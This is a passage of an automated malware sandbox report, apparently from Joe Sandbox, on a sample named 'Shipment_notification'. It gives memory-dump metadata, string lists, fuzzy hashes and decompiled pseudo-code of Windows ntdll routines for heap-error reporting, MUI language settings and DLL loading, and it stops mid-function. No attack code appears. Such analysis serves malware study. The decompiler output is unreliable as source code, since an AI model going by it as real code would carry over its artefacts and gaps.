                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01B9B2F3
                                                                                • read from, xrefs: 01B9B4AD, 01B9B4B2
                                                                                • *** then kb to get the faulting stack, xrefs: 01B9B51C
                                                                                • write to, xrefs: 01B9B4A6
                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01B9B53F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                • API String ID: 0-108210295
                                                                                • Opcode ID: 0dc0c1f392c5599a83b14a96509ed41dfbefc1fd6f2188e9e6de71f5f5f1ffe1
                                                                                • Instruction ID: cc922a94fee18e2f81b016c2976c20c20b69777e0f5b246499249b43a6fc4c3f
                                                                                • Opcode Fuzzy Hash: 0dc0c1f392c5599a83b14a96509ed41dfbefc1fd6f2188e9e6de71f5f5f1ffe1
                                                                                • Instruction Fuzzy Hash: FF811375A40200FFDF29AA5AED85D7B3F35EF56B52F0040E8F5052B252D3618612DBB2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 44%
                                                                                			E01BA1C06() {
                                                                                				signed int _t27;
                                                                                				char* _t104;
                                                                                				char* _t105;
                                                                                				intOrPtr _t113;
                                                                                				intOrPtr _t115;
                                                                                				intOrPtr _t117;
                                                                                				intOrPtr _t119;
                                                                                				intOrPtr _t120;
                                                                                
                                                                                				_t105 = 0x1ac48a4;
                                                                                				_t104 = "HEAP: ";
                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                					_push(_t104);
                                                                                					E01AEB150();
                                                                                				} else {
                                                                                					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                				}
                                                                                				_push( *0x1bd589c);
                                                                                				E01AEB150("Heap error detected at %p (heap handle %p)\n",  *0x1bd58a0);
                                                                                				_t27 =  *0x1bd5898; // 0x0
                                                                                				if(_t27 <= 0xf) {
                                                                                					switch( *((intOrPtr*)(_t27 * 4 +  &M01BA1E96))) {
                                                                                						case 0:
                                                                                							_t105 = "heap_failure_internal";
                                                                                							goto L21;
                                                                                						case 1:
                                                                                							goto L21;
                                                                                						case 2:
                                                                                							goto L21;
                                                                                						case 3:
                                                                                							goto L21;
                                                                                						case 4:
                                                                                							goto L21;
                                                                                						case 5:
                                                                                							goto L21;
                                                                                						case 6:
                                                                                							goto L21;
                                                                                						case 7:
                                                                                							goto L21;
                                                                                						case 8:
                                                                                							goto L21;
                                                                                						case 9:
                                                                                							goto L21;
                                                                                						case 0xa:
                                                                                							goto L21;
                                                                                						case 0xb:
                                                                                							goto L21;
                                                                                						case 0xc:
                                                                                							goto L21;
                                                                                						case 0xd:
                                                                                							goto L21;
                                                                                						case 0xe:
                                                                                							goto L21;
                                                                                						case 0xf:
                                                                                							goto L21;
                                                                                					}
                                                                                				}
                                                                                				L21:
                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                					_push(_t104);
                                                                                					E01AEB150();
                                                                                				} else {
                                                                                					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                				}
                                                                                				_push(_t105);
                                                                                				E01AEB150("Error code: %d - %s\n",  *0x1bd5898);
                                                                                				_t113 =  *0x1bd58a4; // 0x0
                                                                                				if(_t113 != 0) {
                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                						_push(_t104);
                                                                                						E01AEB150();
                                                                                					} else {
                                                                                						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                					}
                                                                                					E01AEB150("Parameter1: %p\n",  *0x1bd58a4);
                                                                                				}
                                                                                				_t115 =  *0x1bd58a8; // 0x0
                                                                                				if(_t115 != 0) {
                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                						_push(_t104);
                                                                                						E01AEB150();
                                                                                					} else {
                                                                                						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                					}
                                                                                					E01AEB150("Parameter2: %p\n",  *0x1bd58a8);
                                                                                				}
                                                                                				_t117 =  *0x1bd58ac; // 0x0
                                                                                				if(_t117 != 0) {
                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                						_push(_t104);
                                                                                						E01AEB150();
                                                                                					} else {
                                                                                						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                					}
                                                                                					E01AEB150("Parameter3: %p\n",  *0x1bd58ac);
                                                                                				}
                                                                                				_t119 =  *0x1bd58b0; // 0x0
                                                                                				if(_t119 != 0) {
                                                                                					L41:
                                                                                					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                						_push(_t104);
                                                                                						E01AEB150();
                                                                                					} else {
                                                                                						E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                					}
                                                                                					_push( *0x1bd58b4);
                                                                                					E01AEB150("Last known valid blocks: before - %p, after - %p\n",  *0x1bd58b0);
                                                                                				} else {
                                                                                					_t120 =  *0x1bd58b4; // 0x0
                                                                                					if(_t120 != 0) {
                                                                                						goto L41;
                                                                                					}
                                                                                				}
                                                                                				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                                					_push(_t104);
                                                                                					E01AEB150();
                                                                                				} else {
                                                                                					E01AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                				}
                                                                                				return E01AEB150("Stack trace available at %p\n", 0x1bd58c0);
                                                                                			}











                                                                                0x01ba1d17
                                                                                0x01ba1d1f
                                                                                0x01ba1d25
                                                                                0x01ba1d30
                                                                                0x01ba1d4f
                                                                                0x01ba1d50
                                                                                0x01ba1d32
                                                                                0x01ba1d47
                                                                                0x01ba1d4c
                                                                                0x01ba1d61
                                                                                0x01ba1d67
                                                                                0x01ba1d68
                                                                                0x01ba1d6e
                                                                                0x01ba1d79
                                                                                0x01ba1d98
                                                                                0x01ba1d99
                                                                                0x01ba1d7b
                                                                                0x01ba1d90
                                                                                0x01ba1d95
                                                                                0x01ba1daa
                                                                                0x01ba1db0
                                                                                0x01ba1db1
                                                                                0x01ba1db7
                                                                                0x01ba1dc2
                                                                                0x01ba1de1
                                                                                0x01ba1de2
                                                                                0x01ba1dc4
                                                                                0x01ba1dd9
                                                                                0x01ba1dde
                                                                                0x01ba1df3
                                                                                0x01ba1df9
                                                                                0x01ba1dfa
                                                                                0x01ba1e00
                                                                                0x01ba1e0a
                                                                                0x01ba1e13
                                                                                0x01ba1e32
                                                                                0x01ba1e33
                                                                                0x01ba1e15
                                                                                0x01ba1e2a
                                                                                0x01ba1e2f
                                                                                0x01ba1e39
                                                                                0x01ba1e4a
                                                                                0x01ba1e02
                                                                                0x01ba1e02
                                                                                0x01ba1e08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ba1e08
                                                                                0x01ba1e5b
                                                                                0x01ba1e7a
                                                                                0x01ba1e7b
                                                                                0x01ba1e5d
                                                                                0x01ba1e72
                                                                                0x01ba1e77
                                                                                0x01ba1e95

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                • API String ID: 0-2897834094
                                                                                • Opcode ID: 715bde0c810b5268961090d5681be4548840942af9765033e2f4d26ec4bbc623
                                                                                • Instruction ID: 83f25ff186617a3fdabf3197b87183921afb26e91f93a24712e05b803fe2e7e1
                                                                                • Opcode Fuzzy Hash: 715bde0c810b5268961090d5681be4548840942af9765033e2f4d26ec4bbc623
                                                                                • Instruction Fuzzy Hash: E261D33251A646EFD369EB8DD58DE2473F4EB04970F8981AEF50A5F301E72598408B1A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E01AF3D34(signed int* __ecx) {
                                                                                				signed int* _v8;
                                                                                				char _v12;
                                                                                				signed int* _v16;
                                                                                				signed int* _v20;
                                                                                				char _v24;
                                                                                				signed int _v28;
                                                                                				signed int _v32;
                                                                                				char _v36;
                                                                                				signed int _v40;
                                                                                				signed int _v44;
                                                                                				signed int* _v48;
                                                                                				signed int* _v52;
                                                                                				signed int _v56;
                                                                                				signed int _v60;
                                                                                				char _v68;
                                                                                				signed int _t140;
                                                                                				signed int _t161;
                                                                                				signed int* _t236;
                                                                                				signed int* _t242;
                                                                                				signed int* _t243;
                                                                                				signed int* _t244;
                                                                                				signed int* _t245;
                                                                                				signed int _t255;
                                                                                				void* _t257;
                                                                                				signed int _t260;
                                                                                				void* _t262;
                                                                                				signed int _t264;
                                                                                				void* _t267;
                                                                                				signed int _t275;
                                                                                				signed int* _t276;
                                                                                				short* _t277;
                                                                                				signed int* _t278;
                                                                                				signed int* _t279;
                                                                                				signed int* _t280;
                                                                                				short* _t281;
                                                                                				signed int* _t282;
                                                                                				short* _t283;
                                                                                				signed int* _t284;
                                                                                				void* _t285;
                                                                                
                                                                                				_v60 = _v60 | 0xffffffff;
                                                                                				_t280 = 0;
                                                                                				_t242 = __ecx;
                                                                                				_v52 = __ecx;
                                                                                				_v8 = 0;
                                                                                				_v20 = 0;
                                                                                				_v40 = 0;
                                                                                				_v28 = 0;
                                                                                				_v32 = 0;
                                                                                				_v44 = 0;
                                                                                				_v56 = 0;
                                                                                				_t275 = 0;
                                                                                				_v16 = 0;
                                                                                				if(__ecx == 0) {
                                                                                					_t280 = 0xc000000d;
                                                                                					_t140 = 0;
                                                                                					L50:
                                                                                					 *_t242 =  *_t242 | 0x00000800;
                                                                                					_t242[0x13] = _t140;
                                                                                					_t242[0x16] = _v40;
                                                                                					_t242[0x18] = _v28;
                                                                                					_t242[0x14] = _v32;
                                                                                					_t242[0x17] = _t275;
                                                                                					_t242[0x15] = _v44;
                                                                                					_t242[0x11] = _v56;
                                                                                					_t242[0x12] = _v60;
                                                                                					return _t280;
                                                                                				}
                                                                                				if(E01AF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                					_v56 = 1;
                                                                                					if(_v8 != 0) {
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                                					}
                                                                                					_v8 = _t280;
                                                                                				}
                                                                                				if(E01AF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                                					_v60 =  *_v8;
                                                                                					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                                					_v8 = _t280;
                                                                                				}
                                                                                				if(E01AF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                					L16:
                                                                                					if(E01AF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                						L28:
                                                                                						if(E01AF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                                							L46:
                                                                                							_t275 = _v16;
                                                                                							L47:
                                                                                							_t161 = 0;
                                                                                							L48:
                                                                                							if(_v8 != 0) {
                                                                                								L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                                							}
                                                                                							_t140 = _v20;
                                                                                							if(_t140 != 0) {
                                                                                								if(_t275 != 0) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                                									_t275 = 0;
                                                                                									_v28 = 0;
                                                                                									_t140 = _v20;
                                                                                								}
                                                                                							}
                                                                                							goto L50;
                                                                                						}
                                                                                						_t167 = _v12;
                                                                                						_t255 = _v12 + 4;
                                                                                						_v44 = _t255;
                                                                                						if(_t255 == 0) {
                                                                                							_t276 = _t280;
                                                                                							_v32 = _t280;
                                                                                						} else {
                                                                                							_t276 = L01B04620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                                							_t167 = _v12;
                                                                                							_v32 = _t276;
                                                                                						}
                                                                                						if(_t276 == 0) {
                                                                                							_v44 = _t280;
                                                                                							_t280 = 0xc0000017;
                                                                                							goto L46;
                                                                                						} else {
                                                                                							E01B2F3E0(_t276, _v8, _t167);
                                                                                							_v48 = _t276;
                                                                                							_t277 = E01B31370(_t276, 0x1ac4e90);
                                                                                							_pop(_t257);
                                                                                							if(_t277 == 0) {
                                                                                								L38:
                                                                                								_t170 = _v48;
                                                                                								if( *_v48 != 0) {
                                                                                									E01B2BB40(0,  &_v68, _t170);
                                                                                									if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                										_t280 =  &(_t280[0]);
                                                                                									}
                                                                                								}
                                                                                								if(_t280 == 0) {
                                                                                									_t280 = 0;
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                                                									_v44 = 0;
                                                                                									_v32 = 0;
                                                                                								} else {
                                                                                									_t280 = 0;
                                                                                								}
                                                                                								_t174 = _v8;
                                                                                								if(_v8 != 0) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                                                								}
                                                                                								_v8 = _t280;
                                                                                								goto L46;
                                                                                							}
                                                                                							_t243 = _v48;
                                                                                							do {
                                                                                								 *_t277 = 0;
                                                                                								_t278 = _t277 + 2;
                                                                                								E01B2BB40(_t257,  &_v68, _t243);
                                                                                								if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                									_t280 =  &(_t280[0]);
                                                                                								}
                                                                                								_t243 = _t278;
                                                                                								_t277 = E01B31370(_t278, 0x1ac4e90);
                                                                                								_pop(_t257);
                                                                                							} while (_t277 != 0);
                                                                                							_v48 = _t243;
                                                                                							_t242 = _v52;
                                                                                							goto L38;
                                                                                						}
                                                                                					}
                                                                                					_t191 = _v12;
                                                                                					_t260 = _v12 + 4;
                                                                                					_v28 = _t260;
                                                                                					if(_t260 == 0) {
                                                                                						_t275 = _t280;
                                                                                						_v16 = _t280;
                                                                                					} else {
                                                                                						_t275 = L01B04620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                                                						_t191 = _v12;
                                                                                						_v16 = _t275;
                                                                                					}
                                                                                					if(_t275 == 0) {
                                                                                						_v28 = _t280;
                                                                                						_t280 = 0xc0000017;
                                                                                						goto L47;
                                                                                					} else {
                                                                                						E01B2F3E0(_t275, _v8, _t191);
                                                                                						_t285 = _t285 + 0xc;
                                                                                						_v48 = _t275;
                                                                                						_t279 = _t280;
                                                                                						_t281 = E01B31370(_v16, 0x1ac4e90);
                                                                                						_pop(_t262);
                                                                                						if(_t281 != 0) {
                                                                                							_t244 = _v48;
                                                                                							do {
                                                                                								 *_t281 = 0;
                                                                                								_t282 = _t281 + 2;
                                                                                								E01B2BB40(_t262,  &_v68, _t244);
                                                                                								if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                									_t279 =  &(_t279[0]);
                                                                                								}
                                                                                								_t244 = _t282;
                                                                                								_t281 = E01B31370(_t282, 0x1ac4e90);
                                                                                								_pop(_t262);
                                                                                							} while (_t281 != 0);
                                                                                							_v48 = _t244;
                                                                                							_t242 = _v52;
                                                                                						}
                                                                                						_t201 = _v48;
                                                                                						_t280 = 0;
                                                                                						if( *_v48 != 0) {
                                                                                							E01B2BB40(_t262,  &_v68, _t201);
                                                                                							if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                								_t279 =  &(_t279[0]);
                                                                                							}
                                                                                						}
                                                                                						if(_t279 == 0) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                                                							_v28 = _t280;
                                                                                							_v16 = _t280;
                                                                                						}
                                                                                						_t202 = _v8;
                                                                                						if(_v8 != 0) {
                                                                                							L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                                                						}
                                                                                						_v8 = _t280;
                                                                                						goto L28;
                                                                                					}
                                                                                				}
                                                                                				_t214 = _v12;
                                                                                				_t264 = _v12 + 4;
                                                                                				_v40 = _t264;
                                                                                				if(_t264 == 0) {
                                                                                					_v20 = _t280;
                                                                                				} else {
                                                                                					_t236 = L01B04620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                                                					_t280 = _t236;
                                                                                					_v20 = _t236;
                                                                                					_t214 = _v12;
                                                                                				}
                                                                                				if(_t280 == 0) {
                                                                                					_t161 = 0;
                                                                                					_t280 = 0xc0000017;
                                                                                					_v40 = 0;
                                                                                					goto L48;
                                                                                				} else {
                                                                                					E01B2F3E0(_t280, _v8, _t214);
                                                                                					_t285 = _t285 + 0xc;
                                                                                					_v48 = _t280;
                                                                                					_t283 = E01B31370(_t280, 0x1ac4e90);
                                                                                					_pop(_t267);
                                                                                					if(_t283 != 0) {
                                                                                						_t245 = _v48;
                                                                                						do {
                                                                                							 *_t283 = 0;
                                                                                							_t284 = _t283 + 2;
                                                                                							E01B2BB40(_t267,  &_v68, _t245);
                                                                                							if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                								_t275 = _t275 + 1;
                                                                                							}
                                                                                							_t245 = _t284;
                                                                                							_t283 = E01B31370(_t284, 0x1ac4e90);
                                                                                							_pop(_t267);
                                                                                						} while (_t283 != 0);
                                                                                						_v48 = _t245;
                                                                                						_t242 = _v52;
                                                                                					}
                                                                                					_t224 = _v48;
                                                                                					_t280 = 0;
                                                                                					if( *_v48 != 0) {
                                                                                						E01B2BB40(_t267,  &_v68, _t224);
                                                                                						if(L01AF43C0( &_v68,  &_v24) != 0) {
                                                                                							_t275 = _t275 + 1;
                                                                                						}
                                                                                					}
                                                                                					if(_t275 == 0) {
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                                                						_v40 = _t280;
                                                                                						_v20 = _t280;
                                                                                					}
                                                                                					_t225 = _v8;
                                                                                					if(_v8 != 0) {
                                                                                						L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                                                					}
                                                                                					_v8 = _t280;
                                                                                					goto L16;
                                                                                				}
                                                                                			}


                                                                                Strings
                                                                                • Kernel-MUI-Language-SKU, xrefs: 01AF3F70
                                                                                • WindowsExcludedProcs, xrefs: 01AF3D6F
                                                                                • Kernel-MUI-Language-Allowed, xrefs: 01AF3DC0
                                                                                • Kernel-MUI-Number-Allowed, xrefs: 01AF3D8C
                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 01AF3E97
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 0-258546922
                                                                                • Opcode ID: 4ff636f6ab9a4944940ed3fc0a795b1693d349ec0614517a94347a539db4a427
                                                                                • Instruction ID: 5bb1f07a01cdd951c039a2ea6c8278da4ff220836351e282c1e09c95f4acae07
                                                                                • Opcode Fuzzy Hash: 4ff636f6ab9a4944940ed3fc0a795b1693d349ec0614517a94347a539db4a427
                                                                                • Instruction Fuzzy Hash: 65F12C72D00619EBCF16DFD8C980AEEBBB9FF58650F1540AAE605E7251D7349E01CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E01AF8794(void* __ecx) {
                                                                                				signed int _v0;
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				void* _v16;
                                                                                				signed int _v20;
                                                                                				intOrPtr _v24;
                                                                                				signed int _v28;
                                                                                				signed int _v32;
                                                                                				signed int _v40;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr* _t77;
                                                                                				signed int _t80;
                                                                                				signed char _t81;
                                                                                				signed int _t87;
                                                                                				signed int _t91;
                                                                                				void* _t92;
                                                                                				void* _t94;
                                                                                				signed int _t95;
                                                                                				signed int _t103;
                                                                                				signed int _t105;
                                                                                				signed int _t110;
                                                                                				signed int _t118;
                                                                                				intOrPtr* _t121;
                                                                                				intOrPtr _t122;
                                                                                				signed int _t125;
                                                                                				signed int _t129;
                                                                                				signed int _t131;
                                                                                				signed int _t134;
                                                                                				signed int _t136;
                                                                                				signed int _t143;
                                                                                				signed int* _t147;
                                                                                				signed int _t151;
                                                                                				void* _t153;
                                                                                				signed int* _t157;
                                                                                				signed int _t159;
                                                                                				signed int _t161;
                                                                                				signed int _t166;
                                                                                				signed int _t168;
                                                                                
                                                                                				_push(__ecx);
                                                                                				_t153 = __ecx;
                                                                                				_t159 = 0;
                                                                                				_t121 = __ecx + 0x3c;
                                                                                				if( *_t121 == 0) {
                                                                                					L2:
                                                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                							L6:
                                                                                							if(E01AF934A() != 0) {
                                                                                								_t159 = E01B6A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                								__eflags = _t159;
                                                                                								if(_t159 < 0) {
                                                                                									_t81 =  *0x1bd5780; // 0x0
                                                                                									__eflags = _t81 & 0x00000003;
                                                                                									if((_t81 & 0x00000003) != 0) {
                                                                                										_push(_t159);
                                                                                										E01B65510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                										_t81 =  *0x1bd5780; // 0x0
                                                                                									}
                                                                                									__eflags = _t81 & 0x00000010;
                                                                                									if((_t81 & 0x00000010) != 0) {
                                                                                										asm("int3");
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							_t159 = E01AF849B(0, _t122, _t153, _t159, _t180);
                                                                                							if(_t159 >= 0) {
                                                                                								goto L6;
                                                                                							}
                                                                                						}
                                                                                						_t80 = _t159;
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_t125 = 0x13;
                                                                                						asm("int 0x29");
                                                                                						_push(0);
                                                                                						_push(_t159);
                                                                                						_t161 = _t125;
                                                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                						_t143 = 0;
                                                                                						_v40 = _t161;
                                                                                						_t118 = 0;
                                                                                						_push(_t153);
                                                                                						__eflags = _t87;
                                                                                						if(_t87 != 0) {
                                                                                							_t118 = _t87 + 0x5d8;
                                                                                							__eflags = _t118;
                                                                                							if(_t118 == 0) {
                                                                                								L46:
                                                                                								_t118 = 0;
                                                                                							} else {
                                                                                								__eflags =  *(_t118 + 0x30);
                                                                                								if( *(_t118 + 0x30) == 0) {
                                                                                									goto L46;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_v32 = 0;
                                                                                						_v28 = 0;
                                                                                						_v16 = 0;
                                                                                						_v20 = 0;
                                                                                						_v12 = 0;
                                                                                						__eflags = _t118;
                                                                                						if(_t118 != 0) {
                                                                                							__eflags = _t161;
                                                                                							if(_t161 != 0) {
                                                                                								__eflags =  *(_t118 + 8);
                                                                                								if( *(_t118 + 8) == 0) {
                                                                                									L22:
                                                                                									_t143 = 1;
                                                                                									__eflags = 1;
                                                                                								} else {
                                                                                									_t19 = _t118 + 0x40; // 0x40
                                                                                									_t156 = _t19;
                                                                                									E01AF8999(_t19,  &_v16);
                                                                                									__eflags = _v0;
                                                                                									if(_v0 != 0) {
                                                                                										__eflags = _v0 - 1;
                                                                                										if(_v0 != 1) {
                                                                                											goto L22;
                                                                                										} else {
                                                                                											_t128 =  *(_t161 + 0x64);
                                                                                											__eflags =  *(_t161 + 0x64);
                                                                                											if( *(_t161 + 0x64) == 0) {
                                                                                												goto L22;
                                                                                											} else {
                                                                                												E01AF8999(_t128,  &_v12);
                                                                                												_t147 = _v12;
                                                                                												_t91 = 0;
                                                                                												__eflags = 0;
                                                                                												_t129 =  *_t147;
                                                                                												while(1) {
                                                                                													__eflags =  *((intOrPtr*)(0x1bd5c60 + _t91 * 8)) - _t129;
                                                                                													if( *((intOrPtr*)(0x1bd5c60 + _t91 * 8)) == _t129) {
                                                                                														break;
                                                                                													}
                                                                                													_t91 = _t91 + 1;
                                                                                													__eflags = _t91 - 5;
                                                                                													if(_t91 < 5) {
                                                                                														continue;
                                                                                													} else {
                                                                                														_t131 = 0;
                                                                                														__eflags = 0;
                                                                                													}
                                                                                													L37:
                                                                                													__eflags = _t131;
                                                                                													if(_t131 != 0) {
                                                                                														goto L22;
                                                                                													} else {
                                                                                														__eflags = _v16 - _t147;
                                                                                														if(_v16 != _t147) {
                                                                                															goto L22;
                                                                                														} else {
                                                                                															E01B02280(_t92, 0x1bd86cc);
                                                                                															_t94 = E01BB9DFB( &_v20);
                                                                                															__eflags = _t94 - 1;
                                                                                															if(_t94 != 1) {
                                                                                															}
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															asm("movsd");
                                                                                															 *_t118 =  *_t118 + 1;
                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                															_t95 = E01B161A0( &_v32);
                                                                                															__eflags = _t95;
                                                                                															if(_t95 != 0) {
                                                                                																__eflags = _v32 | _v28;
                                                                                																if((_v32 | _v28) != 0) {
                                                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                                                																	_t134 = _t71;
                                                                                																	goto L55;
                                                                                																}
                                                                                															}
                                                                                															goto L30;
                                                                                														}
                                                                                													}
                                                                                													goto L56;
                                                                                												}
                                                                                												_t92 = 0x1bd5c64 + _t91 * 8;
                                                                                												asm("lock xadd [eax], ecx");
                                                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                												goto L37;
                                                                                											}
                                                                                										}
                                                                                										goto L56;
                                                                                									} else {
                                                                                										_t143 = E01AF8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                										__eflags = _t143;
                                                                                										if(_t143 != 0) {
                                                                                											_t157 = _v12;
                                                                                											_t103 = 0;
                                                                                											__eflags = 0;
                                                                                											_t136 =  &(_t157[1]);
                                                                                											 *(_t161 + 0x64) = _t136;
                                                                                											_t151 =  *_t157;
                                                                                											_v20 = _t136;
                                                                                											while(1) {
